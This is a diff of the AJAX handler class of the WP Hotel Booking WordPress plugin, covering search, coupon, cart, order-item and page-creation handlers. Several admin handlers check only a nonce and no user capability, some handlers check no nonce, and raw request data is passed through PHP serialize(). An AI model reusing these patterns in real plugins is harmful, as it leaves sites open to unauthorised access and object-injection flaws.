-	static function parse_search_params() {
-		check_ajax_referer( 'hb_search_nonce_action', '_nonce' );
-		$params = array(
-			'hotel-booking'     => hb_get_request( 'hotel-booking' ),
-			'check_in_date'     => hb_get_request( 'check_in_date' ),
-			'check_out_date'    => hb_get_request( 'check_out_date' ),
-			'hb_check_in_date'  => hb_get_request( 'hb_check_in_date' ),
-			'hb_check_out_date' => hb_get_request( 'hb_check_out_date' ),
-			'adults'            => hb_get_request( 'adults_capacity' ),
-			'max_child'         => hb_get_request( 'max_child' ),
-		);
-
-		$return = apply_filters(
-			'hotel_booking_parse_search_param',
-			array(
-				'success' => 1,
-				'sig'     => base64_encode( wp_json_encode( $params ) ),
-				'params'  => $params,
-			)
-		);
-		hb_send_json( $return );
-	}
-
-	static function apply_coupon() {
-		! session_id() && session_start( array( 'read_and_close' => true ) );
-		$code = hb_get_request( 'code' );
-		if ( empty( hb_get_request( 'nonce', false ) )
-			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
-			wp_die( __( 'Require Nonce!', 'wp-hotel-booking' ) );
-		}
-		ob_start();
-		$today  = strtotime( date( 'm/d/Y' ) );
-		$coupon = hb_get_coupons_active( $today, $code );
-
-		$output   = ob_get_clean();
-		$response = array();
-		if ( $coupon ) {
-			$coupon   = HB_Coupon::instance( $coupon );
-			$response = $coupon->validate();
-			if ( $response['is_valid'] ) {
-				$response['result'] = 'success';
-				$response['type']   = get_post_meta( $coupon->ID, '_hb_coupon_discount_type', true );
-				$response['value']  = get_post_meta( $coupon->ID, '_hb_coupon_discount_value', true );
-				// set session
-				WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', $coupon->post->ID );
-				hb_add_message( __( 'Coupon code applied', 'wp-hotel-booking' ) );
-			}
-		} else {
-			$response['message'] = __( 'Coupon does not exist!', 'wp-hotel-booking' );
-		}
-		hb_send_json(
-			$response
-		);
-	}
-
-	static function remove_coupon() {
-		! session_id() && session_start( array( 'read_and_close' => true ) );
-		// delete_transient( 'hb_user_coupon_' . session_id() );
-		WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', null );
-		hb_add_message( __( 'Coupon code removed', 'wp-hotel-booking' ) );
-		hb_send_json(
-			array(
-				'result' => 'success',
-			)
-		);
-	}
-
-	static function parse_booking_params() {
-
-		check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );
-
-		$check_in     = hb_get_request( 'check_in_date' );
-		$check_out    = hb_get_request( 'check_out_date' );
-		$num_of_rooms = hb_get_request( 'hb-num-of-rooms' );
-
-		$params = array(
-			'hotel-booking'   => hb_get_request( 'hotel-booking' ),
-			'check_in_date'   => $check_in,
-			'check_out_date'  => $check_out,
-			'hb-num-of-rooms' => $num_of_rooms,
-		);
-
-		// print_r($params);
-		hb_send_json(
-			array(
-				'success' => 1,
-				'sig'     => base64_encode( serialize( $params ) ),
-			)
-		);
-	}
-
-	static function ajax_add_to_cart() {
-		$res = new WPHB_REST_Response();
-
-		try {
-			if ( ! check_ajax_referer( 'hb_booking_nonce_action', 'nonce' ) ) {
-				throw new Exception( __( 'Invalid request', 'wp-hotel-booking' ) );
-			}
-
-			$qty            = WPHB_Helpers::get_param( 'hb-num-of-rooms', 1, 'int' );
-			$room_id        = WPHB_Helpers::get_param( 'room-id', 0, 'int' );
-			$check_in_date  = WPHB_Helpers::get_param( 'check_in_date' );
-			$check_out_date = WPHB_Helpers::get_param( 'check_out_date' );
-			$adult_qty      = WPHB_Helpers::get_param( 'adult_qty', 1, 'int' );
-			$child_qty      = WPHB_Helpers::get_param( 'child_qty', 0, 'int' );
-
-			$from_check_dates_room = WPHB_Helpers::get_param( 'from-check-dates-room', 0, 'int' );
-
-			if ( ! $room_id ) {
-				throw new Exception( __( 'Room ID is invalid.', 'wp-hotel-booking' ) );
-			}
-
-			$room = get_post( $room_id );
-			if ( ! $room || ! is_a( $room, 'WP_POST' ) || $room->post_type != 'hb_room' ) {
-				throw new Exception( __( 'Room ID is not exists.', 'wp-hotel-booking' ) );
-			}
-
-			$available_qty = hotel_booking_get_room_available(
-				$room_id,
-				array(
-					'check_in_date'  => $check_in_date,
-					'check_out_date' => $check_out_date,
-				)
-			);
-			if ( is_wp_error( $available_qty ) ) {
-				throw new Exception( $available_qty->get_error_message() );
-			} elseif ( $qty > $available_qty ) {
-				$message = sprintf( __( 'You can only book up to %d rooms' ), $available_qty );
-				throw new Exception( $message );
-			}
-
-			// Add to cart
-			$params = array(
-				'product_id'     => $room_id,
-				'check_in_date'  => $check_in_date,
-				'check_out_date' => $check_out_date,
-				'adult_qty'      => $adult_qty,
-				'child_qty'      => $child_qty,
-			);
-
-			$cart_item_id = WP_Hotel_Booking::instance()->cart->add_to_cart( $room_id, $params, $qty );
-			if ( ! is_wp_error( $cart_item_id ) ) {
-				$cart_item    = WP_Hotel_Booking::instance()->cart->get_cart_item( $cart_item_id );
-				$room         = $cart_item->product_data;
-				$pageRedirect = WPHB_Settings::instance()->getPageRedirect();
-
-				// Check to add extra
-				$hb_optional_quantity_selected = WPHB_Helpers::get_param( 'hb_optional_quantity_selected', [] );
-				$hb_optional_quantity = WPHB_Helpers::get_param( 'hb_optional_quantity', [] );
-				if ( ! empty( $hb_optional_quantity_selected ) && ! empty( $hb_optional_quantity ) && $cart_item ) {
-					$extra_cart = HB_Extra_Cart::instance();
-					foreach ( $hb_optional_quantity_selected as $extra_id => $select ) {
-						$extra_cart->ajax_added_cart(
-							$cart_item_id,
-							array(
-								'product_id'                    => $room_id,
-								'hb_optional_quantity'          => array( $extra_id => $hb_optional_quantity[ $extra_id ] ),
-								'hb_optional_quantity_selected' => array( $extra_id => 'on' ),
-								'check_in_date'                 => $check_in_date,
-								'check_out_date'                => $check_out_date,
-							)
-						);
-					}
-				}
-				$res->data->redirect = $pageRedirect;
-
-				$res->status  = 'success';
-				$res->message = sprintf( '<label class="hb_success_message">%1$s</label>', __( 'Added successfully.', 'wp-hotel-booking' ) );
-			} else {
-				throw new $cart_item_id->get_error_message();
-			}
-		} catch ( Throwable $e ) {
-			$res->message = $e->getMessage();
-		}
-
-		wp_send_json( $res );
-	}
-
-	// remove cart item
-	static function ajax_remove_item_cart() {
-		if ( ! check_ajax_referer( 'hb_booking_nonce_action', 'nonce' ) ) {
-			return;
-		}
-
-		$cart = WP_Hotel_Booking::instance()->cart;
-
-		if ( empty( $cart->cart_contents ) || ! isset( $_POST['cart_id'] ) || ! array_key_exists( sanitize_text_field( wp_unslash( $_POST['cart_id'] ) ), $cart->cart_contents ) ) {
-			hb_send_json(
-				array(
-					'status'  => 'warning',
-					'message' => __( 'Cart item is not exists.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		if ( $cart->remove_cart_item( sanitize_text_field( wp_unslash( $_POST['cart_id'] ) ) ) ) {
-			$return = apply_filters(
-				'hotel_booking_ajax_remove_cart_item',
-				array(
-					'status'          => 'success',
-					'sub_total'       => hb_format_price( $cart->sub_total ),
-					'grand_total'     => hb_format_price( $cart->total ),
-					'advance_payment' => hb_format_price( $cart->advance_payment ),
-				)
-			);
-
-			hb_send_json( $return );
-		}
-	}
-
-	// ajax load user in booking details
-	static function load_order_user() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) || ! isset( $_POST['user_name'] ) ) {
-			return;
-		}
-
-		if ( ! current_user_can( 'administrator' ) ) {
-			return;
-		}
-
-		$user_name = sanitize_text_field( wp_unslash( $_POST['user_name'] ) );
-		global $wpdb;
-		$sql = $wpdb->prepare(
-			"
-				SELECT user.ID, user.user_email, user.user_login FROM $wpdb->users AS user
-				WHERE
-					user.user_login LIKE %s
-			",
-			'%' . $wpdb->esc_like( $user_name ) . '%'
-		);
-
-		$users = $wpdb->get_results( $sql );
-		wp_send_json( $users );
-		die();
-	}
-
-	// ajax load room in booking details
-	static function load_room_ajax() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) || ! isset( $_POST['room'] ) ) {
-			return;
-		}
-
-		$title = sanitize_text_field( $_POST['room'] );
-		global $wpdb;
-		$sql = $wpdb->prepare(
-			"
-				SELECT room.ID AS ID, room.post_title AS post_title FROM $wpdb->posts AS room
-				WHERE
-					room.post_title LIKE %s
-					AND room.post_type = %s
-					AND room.post_status = %s
-					GROUP BY room.post_name
-			",
-			'%' . $wpdb->esc_like( $title ) . '%',
-			'hb_room',
-			'publish'
-		);
-
-		$rooms = $wpdb->get_results( $sql );
-		wp_send_json( $rooms );
-		die();
-	}
-
-	// ajax check available room in booking details
-	static function check_room_available() {
-
-		if ( ! isset( $_POST['hotel-admin-check-room-available'] ) || ! wp_verify_nonce( sanitize_key( $_POST['hotel-admin-check-room-available'] ), 'hotel_admin_check_room_available' ) ) {
-			return;
-		}
-
-		// hotel_booking_get_room_available
-		if ( ! isset( $_POST['product_id'] ) || ! $_POST['product_id'] ) {
-			wp_send_json(
-				array(
-					'status'  => false,
-					'message' => __( 'Room not found.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		if ( ! isset( $_POST['check_in_date_timestamp'] ) || ! isset( $_POST['check_out_date_timestamp'] ) ) {
-			wp_send_json(
-				array(
-					'status'  => false,
-					'message' => __( 'Please select check in date and checkout date.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		$product_id = absint( $_POST['product_id'] );
-		$qty        = hotel_booking_get_room_available(
-			$product_id,
-			array(
-				'check_in_date'  => sanitize_text_field( wp_unslash( $_POST['check_in_date_timestamp'] ) ),
-				'check_out_date' => sanitize_text_field( wp_unslash( $_POST['check_out_date_timestamp'] ) ),
-			)
-		);
-
-		if ( $qty && ! is_wp_error( $qty ) ) {
-
-			// HB_Room_Extra instead of HB_Room
-			$room_extra = HB_Room_Extra::instance( $product_id );
-
-			$room_extra = $room_extra->get_extra();
-
-			$args = apply_filters(
-				'hotel_booking_check_room_available',
-				array(
-					'status'       => true,
-					'qty'          => $qty,
-					'qty_selected' => isset( $_POST['order_item_id'] ) ? hb_get_order_item_meta( $_POST['order_item_id'], 'qty', true ) : 0,
-					'product_id'   => $product_id,
-					'extra'        => $room_extra,
-				)
-			);
-			wp_send_json( $args );
-		} else {
-			wp_send_json(
-				array(
-					'status'  => false,
-					'message' => $qty->get_error_message(),
-				)
-			);
-		}
-	}
-
-	// ajax load oder item to edit
-	static function load_order_item() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) ) {
-			return;
-		}
-
-		if ( ! isset( $_POST['order_item_id'] ) ) {
-			wp_send_json( array() );
-		}
-
-		$order_id      = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-		$order_item_id = absint( $_POST['order_item_id'] );
-		$product_id    = hb_get_order_item_meta( $order_item_id, 'product_id', true );
-		$checkin       = hb_get_order_item_meta( $order_item_id, 'check_in_date', true );
-		$checkout      = hb_get_order_item_meta( $order_item_id, 'check_out_date', true );
-
-		// extra hook
-		$args = apply_filters(
-			'hotel_booking_admin_load_order_item',
-			array(
-				'status'                   => true,
-				'modal_title'              => __( 'Edit order item', 'wp-hotel-booking' ),
-				'order_id'                 => $order_id,
-				'order_item_id'            => $order_item_id,
-				'product_id'               => $product_id,
-				'room'                     => array(
-					'ID'         => $product_id,
-					'post_title' => get_the_title( hb_get_order_item_meta( $order_item_id, 'product_id', true ) ),
-				),
-				'check_in_date'            => date_i18n( hb_get_date_format(), $checkin ),
-				'check_out_date'           => date_i18n( hb_get_date_format(), $checkout ),
-				'check_in_date_timestamp'  => $checkin,
-				'check_out_date_timestamp' => $checkout,
-				'qty'                      => hotel_booking_get_room_available(
-					$product_id,
-					array(
-						'check_in_date'  => $checkin,
-						'check_out_date' => $checkout,
-						'excerpt'        => array( $order_id ),
-					)
-				),
-				'qty_selected'             => hb_get_order_item_meta( $order_item_id, 'qty', true ),
-				'post_type'                => get_post_type( $product_id ),
-			)
-		);
-		wp_send_json( $args );
-	}
-
-	// ajax load coupons code
-	static function load_coupon_ajax() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) ) {
-			return;
-		}
-
-		$code = sanitize_text_field( wp_unslash( $_POST['coupon'] ) );
-		$time = time();
-
-		global $wpdb;
-		$sql = $wpdb->prepare(
-			"
-				SELECT coupon.ID, coupon.post_title FROM $wpdb->posts AS coupon
-					INNER JOIN $wpdb->postmeta AS start ON start.post_id = coupon.ID
-					INNER JOIN $wpdb->postmeta AS end ON end.post_id = coupon.ID
-				WHERE
-					coupon.post_type = %s
-					AND coupon.post_title LIKE %s
-					AND coupon.post_status = %s
-					AND start.meta_key = %s
-					AND end.meta_key = %s
-					AND ( start.meta_value <= %d AND end.meta_value >= %d )
-			",
-			'hb_coupon',
-			'%' . $wpdb->esc_like( $code ) . '%',
-			'publish',
-			'_hb_coupon_date_from_timestamp',
-			'_hb_coupon_date_to_timestamp',
-			$time,
-			$time
-		);
-
-		wp_send_json( apply_filters( 'hotel_admin_get_coupons', $wpdb->get_results( $sql ) ) );
-	}
-
-	// book mamunal add order item
-	static function admin_add_order_item() {
-		$result = array(
-			'status'  => false,
-			'message' => __( 'Something when wrong!', 'wp-hotel-booking' ),
-		);
-
-		if ( ! current_user_can( 'administrator' )
-			&& ! current_user_can( 'wphb_hotel_manager' )
-			&& ! current_user_can( 'wphb_booking_editor' ) ) {
-			$result['message'] = __( 'Request not valid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		if ( ! isset( $_POST['hotel-admin-check-room-available'] ) || ! wp_verify_nonce( sanitize_key( $_POST['hotel-admin-check-room-available'] ), 'hotel_admin_check_room_available' ) ) {
-			$result['message'] = __( 'nonce is invalid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		if ( ! isset( $_POST['check_in_date_timestamp'] ) || ! isset( $_POST['check_out_date_timestamp'] ) ) {
-			$result['message'] = __( 'Date check-in or date check-out is invalid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		$order_id       = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-		$product_id     = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;
-		$qty            = isset( $_POST['qty'] ) ? absint( $_POST['qty'] ) : 0;
-		$check_in_date  = absint( $_POST['check_in_date_timestamp'] );
-		$check_out_date = absint( $_POST['check_out_date_timestamp'] );
-
-		// Check room exist
-		$room = get_post( $product_id );
-
-		if ( ! is_a( $room, 'WP_POST' ) || ! isset( $room ) || $room->post_type != 'hb_room' ) {
-			$result['message'] = __( 'Id room is invalid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		if ( ! $qty ) {
-			$result['message'] = __( 'Can not add item with zero quantity.', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		$order_item_id = 0;
-		if ( isset( $_POST['order_item_id'] ) && $_POST['order_item_id'] ) {
-			$order_item_id = absint( $_POST['order_item_id'] );
-		}
-
-		$args = array(
-			'order_item_name'   => get_the_title( $product_id ),
-			'order_item_type'   => isset( $_POST['order_item_type'] ) && $_POST['order_item_type'] ? sanitize_title( $_POST['order_item_type'] ) : 'line_item',
-			'order_item_parent' => isset( $_POST['order_item_parent'] ) && $_POST['order_item_parent'] ? absint( $_POST['order_item_parent'] ) : null,
-		);
-		if ( ! $order_item_id ) {
-			// add new order item
-			$order_item_id = hb_add_order_item( $order_id, $args );
-		} else {
-			// update order item
-			hb_update_order_item( $order_item_id, $args );
-		}
-
-		// update order item meta
-		hb_update_order_item_meta( $order_item_id, 'product_id', $product_id );
-		hb_update_order_item_meta( $order_item_id, 'check_in_date', $check_in_date );
-		hb_update_order_item_meta( $order_item_id, 'check_out_date', $check_out_date );
-		hb_update_order_item_meta( $order_item_id, 'qty', $qty );
-
-		// Addition package
-		if ( isset( $_POST['sub_items'] ) ) {
-			hb_update_order_item_meta( $order_item_id, 'addition_package_items', serialize( $_POST['sub_items'] ) );
-		}
-
-		$params        = array(
-			'check_in_date'  => $check_in_date,
-			'check_out_date' => $check_out_date,
-			'quantity'       => $qty,
-			'order_item_id'  => $order_item_id,
-		);
-		$product_class = hotel_booking_get_product_class( $product_id, $params );
-
-		// update subtotal, total
-		$subtotal = $product_class->amount_exclude_tax();
-		$total    = $product_class->amount_include_tax();
-		hb_update_order_item_meta( $order_item_id, 'subtotal', $subtotal );
-		hb_update_order_item_meta( $order_item_id, 'total', $total );
-		hb_update_order_item_meta( $order_item_id, 'tax_total', $total - $subtotal );
-
-		// allow hook
-		do_action( 'hotel_booking_updated_order_item', $order_id, $order_item_id );
-
-		$post = get_post( $order_id );
-
-		// update booking info meta post
-		WPHB_Booking::instance( $order_id )->update_room_booking( $order_id );
-
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	// remove order item
-	static function admin_remove_order_item() {
-		// verify nonce
-		if ( ! check_ajax_referer( 'hotel-booking-confirm', 'hotel_booking_confirm' ) ) {
-			return;
-		}
-
-		$order_item_id = isset( $_POST['order_item_id'] ) ? absint( $_POST['order_item_id'] ) : 0;
-		$order_id      = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-		if ( $order_item_id ) {
-			hb_remove_order_item( $order_item_id );
-
-			$post = get_post( $order_id );
-			ob_start();
-			require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-			require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-			$html = ob_get_clean();
-			wp_send_json(
-				array(
-					'status' => true,
-					'html'   => $html,
-				)
-			);
-		}
-	}
-
-	// remove list order items
-	static function admin_remove_order_items() {
-		// verify nonce
-		if ( ! check_ajax_referer( 'hotel-booking-confirm', 'hotel_booking_confirm' ) ) {
-			return;
-		}
-
-		$order_id = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-
-		if ( isset( $_POST['order_item_id'] ) && is_array( $_POST['order_item_id'] ) ) {
-			foreach ( $_POST['order_item_id'] as $key => $o_i_d ) {
-				$o_i_d = absint( $o_i_d );
-				hb_remove_order_item( $o_i_d );
-			}
-		}
-
-		$post = get_post( $order_id );
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	// add new coupon
-	static function add_coupon_to_order() {
-		if ( ! check_ajax_referer( 'hotel_admin_get_coupon_available', 'hotel-admin-get-coupon-available' ) || ! class_exists( 'HB_Coupon' ) ) {
-			return;
-		}
-
-		if ( ! isset( $_POST['order_id'] ) || ! isset( $_POST['coupon_id'] ) ) {
-			return;
-		}
-
-		$order_id  = absint( $_POST['order_id'] );
-		$coupon_id = absint( $_POST['coupon_id'] );
-
-		$coupon   = HB_Coupon::instance( $coupon_id );
-		$subtotal = hb_booking_subtotal( $order_id, false ); // subtotal without coupon
-
-		add_post_meta( $order_id, '_hb_coupon_id', $coupon_id );
-		add_post_meta( $order_id, '_hb_coupon_code', $coupon->coupon_code );
-		add_post_meta( $order_id, '_hb_coupon_value', $coupon->get_discount_value( $subtotal ) );
-
-		$post = get_post( $order_id );
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	// remove coupon order
-	static function remove_coupon_on_order() {
-		if ( ! check_ajax_referer( 'hotel-booking-confirm', 'hotel_booking_confirm' ) ) {
-			return;
-		}
-
-		if ( ! isset( $_POST['order_id'] ) || ! isset( $_POST['coupon_id'] ) ) {
-			return;
-		}
-
-		$order_id = absint( $_POST['order_id'] );
-
-		delete_post_meta( $order_id, '_hb_coupon_id' );
-		delete_post_meta( $order_id, '_hb_coupon_code' );
-		delete_post_meta( $order_id, '_hb_coupon_value' );
-
-		$post = get_post( $order_id );
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	static function load_other_full_calendar() {
-		check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );
-
-		if ( ! isset( $_POST['room_id'] ) ) {
-			wp_send_json(
-				array(
-					'status'  => fasle,
-					'message' => __( 'Room is not exists.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		$room_id = absint( $_POST['room_id'] );
-		if ( ! isset( $_POST['date'] ) ) {
-			wp_send_json(
-				array(
-					'status'  => fasle,
-					'message' => __( 'Date is not exists.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-		$date = sanitize_text_field( wp_unslash( $_POST['date'] ) );
-
-		wp_send_json(
-			array(
-				'status'     => true,
-				'events'     => hotel_booking_print_pricing_json( $room_id, date( 'm/d/Y', strtotime( $date ) ) ),
-				'next'       => date( 'm/d/Y', strtotime( '+1 month', strtotime( $date ) ) ),
-				'prev'       => date( 'm/d/Y', strtotime( '-1 month', strtotime( $date ) ) ),
-				'month_name' => date_i18n( 'F, Y', strtotime( $date ) ),
-			)
-		);
-	}
-}
-
-new WPHB_Ajax();
+<?php
+/**
+ * WP Hotel Booking ajax.
+ *
+ * @version       1.9.6
+ * @author        ThimPress
+ * @package       WP_Hotel_Booking/Classes
+ * @category      Classes
+ * @author        Thimpress, leehld
+ */
+
+/**
+ * Prevent loading this file directly
+ */
+defined( 'ABSPATH' ) || exit;
+
+/**
+ * Class WPHB_Ajax
+ */
+class WPHB_Ajax {
+
+	/**
+	 * @var bool
+	 */
+	protected static $_loaded = false;
+
+	/**
+	 * Constructor
+	 */
+	function __construct() {
+		if ( self::$_loaded ) {
+			return;
+		}
+
+		$ajax_actions = array(
+			//'fetch_customer_info'      => true,
+			'place_order'              => true,
+			'load_room_type_galley'    => false,
+			'parse_search_params'      => true,
+			'parse_booking_params'     => true,
+			'apply_coupon'             => true,
+			'remove_coupon'            => true,
+			'ajax_add_to_cart'         => true,
+			'add_extra_to_cart'        => true,
+			'ajax_remove_item_cart'    => true,
+			'load_order_user'          => false,
+			'load_room_ajax'           => false,
+			'check_room_available'     => false,
+			'load_order_item'          => false,
+			'load_coupon_ajax'         => false,
+			'admin_add_order_item'     => false,
+			'admin_remove_order_item'  => false,
+			'admin_remove_order_items' => false,
+			'add_coupon_to_order'      => false,
+			'remove_coupon_on_order'   => false,
+			'load_other_full_calendar' => false,
+			'dismiss_notice'           => true,
+			'create_pages'             => false,
+		);
+
+		foreach ( $ajax_actions as $action => $priv ) {
+			add_action( "wp_ajax_hotel_booking_{$action}", array( __CLASS__, $action ) );
+			if ( $priv ) {
+				add_action( "wp_ajax_nopriv_hotel_booking_{$action}", array( __CLASS__, $action ) );
+			}
+		}
+		self::$_loaded = true;
+	}
+
+	/**
+	 * It creates a page
+	 */
+	static function create_pages() {
+		$response = array(
+			'code'    => 0,
+			'message' => '',
+		);
+
+		if ( ! current_user_can( 'edit_pages' ) || empty( $_POST['page_name'] ) ) {
+			$response['message'] = __( 'Request invalid', 'wp-hotel-booking' );
+			hb_send_json( $response );
+		}
+
+		$page_name = WPHB_Helpers::sanitize_params_submitted( $_POST['page_name'] );
+
+		if ( $page_name ) {
+			$args = array(
+				'post_type'   => 'page',
+				'post_title'  => $page_name,
+				'post_status' => 'publish',
+			);
+
+			$page_id = wp_insert_post( $args );
+
+			if ( $page_id ) {
+				$response['code']    = 1;
+				$response['message'] = 'create page success';
+				$response['page']    = get_post( $page_id );
+				$response['html']    = '<a href="' . get_edit_post_link( $page_id ) . '" target="_blank">' . __( 'Edit Page', 'wp-hotel-booking' ) . '</a> ';
+				$response['html']   .= '<a href="' . get_permalink( $page_id ) . '" target="_blank">' . __( 'View Page', 'wp-hotel-booking' ) . '</a>';
+			} else {
+				$response['error'] = __( 'Error! Page creation failed. Please try again.', 'wp-hotel-booking' );
+			}
+		} else {
+			$response['error'] = __( 'Empty page name!', 'wp-hotel-booking' );
+		}
+
+		wp_send_json( $response );
+		die;
+	}
+
+	/**
+	 * Add extra to cart action.
+	 */
+	public static function add_extra_to_cart() {
+
+		if ( ! check_ajax_referer( 'hb_select_extra_nonce_action', 'nonce' ) ) {
+			return;
+		}
+
+		$cart_id = sanitize_text_field( wp_unslash( $_POST['cart_id'] ) );
+		if ( ! $cart_id ) {
+			hb_send_json(
+				array(
+					'status'  => 'warning',
+					'message' => __( 'Cart ID is invalid.', 'wp-hotel-booking' ),
+				)
+			);
+		}
+
+		$cart       = WPHB_Cart::instance();
+		$extra_cart = HB_Extra_Cart::instance();
+		$cart_item  = $cart->get_cart_item( $cart_id );
+
+		if ( isset( $_POST['hb_optional_quantity_selected'] ) ) {
+			$selected  = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity_selected'] );
+			$extra_qty = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity'] );
+
+			foreach ( $selected as $extra_id => $select ) {
+				if ( $select == 'on' && $cart_item ) {
+					$extra_cart->ajax_added_cart(
+						$cart_id,
+						array(
+							'hb_optional_quantity' => array( $extra_id => $extra_qty[ $extra_id ] ),
+							'hb_optional_quantity_selected' => array( $extra_id => 'on' ),
+						),
+					);
+				}
+			}
+		}
+		$cart_url = hb_get_cart_url();
+
+		$pageRedirect = WPHB_Settings::instance()->getPageRedirect();
+
+		if ( $pageRedirect == '' ) {
+			$pageRedirect = $cart_url;
+		}
+
+		hb_send_json(
+			array(
+				'status'   => 'success',
+				'redirect' => $pageRedirect,
+			)
+		);
+	}
+
+
+	/**
+	 * Dismiss remove TP Hotel Booking plugin notice
+	 */
+	static function dismiss_notice() {
+		if ( empty( hb_get_request( 'nonce', false ) )
+			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
+			wp_die();
+		}
+
+		if ( is_multisite() ) {
+			update_site_option( 'wphb_notice_remove_hotel_booking', 1 );
+		} else {
+			update_option( 'wphb_notice_remove_hotel_booking', 1 );
+		}
+		wp_send_json(
+			array(
+				'status' => 'done',
+			)
+		);
+	}
+
+	/**
+	 * Fetch customer information with user email
+	 * @deprecated 2.2.8
+	 */
+	static function fetch_customer_info() {
+		_deprecated_function( __METHOD__, '2.2.8' );
+		die();
+		check_ajax_referer( 'wphb_get_customer_info' );
+		$email = hb_get_request( 'email' );
+		$args  = array(
+			'post_type'   => 'hb_booking',
+			'meta_key'    => '_hb_customer_email',
+			'meta_value'  => $email,
+			'post_status' => 'any',
+		);
+		// set_transient( 'hotel_booking_customer_email_' . WPHB_BLOG_ID, $email, DAY_IN_SECONDS );
+		WP_Hotel_Booking::instance()->cart->set_customer( 'customer_email', $email );
+		if ( $posts = get_posts( $args ) ) {
+			$customer       = $posts[0];
+			$customer->data = array();
+			$data           = get_post_meta( $customer->ID );
+			foreach ( $data as $k => $v ) {
+				$customer->data[ $k ] = $v[0];
+			}
+		} else {
+			$customer = null;
+		}
+		hb_send_json( $customer );
+		die();
+	}
+
+	/**
+	 * Process the order with customer information posted via form
+	 *
+	 * @throws Exception
+	 */
+	static function place_order() {
+		hb_customer_place_order();
+	}
+
+	/**
+	 * Get all images for a room type
+	 */
+	static function load_room_type_galley() {
+		$term_id        = hb_get_request( 'term_id' );
+		$attachment_ids = get_option( 'hb_taxonomy_thumbnail_' . $term_id );
+		$attachments    = array();
+		if ( $attachment_ids ) {
+			foreach ( $attachment_ids as $id ) {
+				$attachment    = wp_get_attachment_image_src( $id, 'thumbnail' );
+				$attachments[] = array(
+					'id'  => $id,
+					'src' => $attachment[0],
+				);
+			}
+		}
+		hb_send_json( $attachments );
+	}
+
+	/**
+	 * Catch variables via post method and build a request param
+	 */
+	static function parse_search_params() {
+		check_ajax_referer( 'hb_search_nonce_action', '_nonce' );
+		$params = array(
+			'hotel-booking'     => hb_get_request( 'hotel-booking' ),
+			'check_in_date'     => hb_get_request( 'check_in_date' ),
+			'check_out_date'    => hb_get_request( 'check_out_date' ),
+			'hb_check_in_date'  => hb_get_request( 'hb_check_in_date' ),
+			'hb_check_out_date' => hb_get_request( 'hb_check_out_date' ),
+			'adults'            => hb_get_request( 'adults_capacity' ),
+			'max_child'         => hb_get_request( 'max_child' ),
+		);
+
+		$return = apply_filters(
+			'hotel_booking_parse_search_param',
+			array(
+				'success' => 1,
+				'sig'     => base64_encode( wp_json_encode( $params ) ),
+				'params'  => $params,
+			)
+		);
+		hb_send_json( $return );
+	}
+
+	static function apply_coupon() {
+		! session_id() && session_start( array( 'read_and_close' => true ) );
+		$code = hb_get_request( 'code' );
+		if ( empty( hb_get_request( 'nonce', false ) )
+			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
+			wp_die( __( 'Require Nonce!', 'wp-hotel-booking' ) );
+		}
+		ob_start();
+		$today  = strtotime( date( 'm/d/Y' ) );
